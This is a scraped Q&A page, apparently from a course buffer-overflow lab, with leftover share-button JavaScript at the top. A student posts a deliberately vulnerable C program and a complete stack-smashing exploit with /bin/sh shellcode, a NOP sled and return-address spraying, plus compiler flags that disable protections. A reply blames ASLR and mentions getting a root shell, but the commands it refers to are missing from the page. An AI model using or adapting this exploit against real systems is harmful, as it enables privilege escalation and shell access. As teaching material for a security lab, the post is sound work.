{var%20f='http://v.t.sina.com.cn/share/share.php?appkey=1515056452',u=z||d.location,p=['&url=',e(u),'&title=',e(t||d.title),'&source=',e(r),'&sourceUrl=',e(l),'&content=',c||'gb2312','&pic=',e(p||'')].join('');function%20a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=440,height=430,left=',(s.width-440)/2,',top=',(s.height-430)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent))setTimeout(a,0);else%20a();})(screen,document,encodeURIComponent,'','','https://www.manongdao.com/data/attach/logo/logo.png', '推荐 smile是对你的礼貌 的问题《Buffer Overflow - SegFaults in regular user》','https://www.manongdao.com/q-651316.html','页面编码gb2312|utf-8默认gb2312'));){kind=link}
Below is my code, both the vulnerable program (stack.c) and my exploit (exploit.c). This code works on a pre-packaged Ubuntu 9 that the prof sent out for windows users (I had a friend test it on his computer), but on Ubuntu 12 that I run on my iMac, i get segfaults when I try and do this in a normal user.
here's stack:
//stack.c
#include <stdio.h>
int bof(char *str)
{
char buffer[12];
//BO Vulnerability
strcpy(buffer,str);
return 1;
}
int main(int argc, char* argv[])
{
char str[517];
FILE *badfile;
badfile = fopen("badfile","r");
fread(str, sizeof(char),517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
and exploit:
//exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define DEFAULT_OFFSET 350
char code[]=
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80"
;
unsigned long get_sp(void)
{
__asm__("movl %esp,%eax");
}
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
char *ptr;
long *a_ptr,ret;
int offset = DEFAULT_OFFSET;
int codeSize = sizeof(code);
int buffSize = sizeof(buffer);
if(argc > 1) offset = atoi(argv[1]); //allows for command line input
ptr=buffer;
a_ptr = (long *) ptr;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(buffer, 0x90, buffSize);
//----------------------BEGIN FILL BUFFER----------------------\\
ret = get_sp()+offset;
printf("Return Address: 0x%x\n",get_sp());
printf("Address: 0x%x\n",ret);
ptr = buffer;
a_ptr = (long *) ptr;
int i;
for (i = 0; i < 300;i+=4)
*(a_ptr++) = ret;
for(i = 486;i < codeSize + 486;++i)
buffer[i] = code[i-486];
buffer[buffSize - 1] = '\0';
//-----------------------END FILL BUFFER-----------------------\\
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer,517,1,badfile);
fclose(badfile);
}
To compile these within Ubuntu 12 I used:
gcc -o stack -fno-stack-protector -g -z execstack stack.c
gcc -o exploit exploit.c
Again, it works in a root user, just not a regular user;
Anyways, this is due at midnight and I limped my way through the rest of the assignment with this restriction, but I'd much rather complete it properly if someone has a suggestion. Figured I'd call in the experts before throwing in the towel. I'm looking to see why, this code, will not work in a normal user (as it should, and does on older versions of ubuntu) but does work in a root user. what do i need to change to make this work in the normal user also.
I just ran the code that you provided on a Ubuntu 12.04 VM and it worked fine. My guess is that you didn't turn off ASLR. Try it again with ASLR disabled by either
or
of course in order for it to spawn a root shell you will need to first do:
Hope this helps ...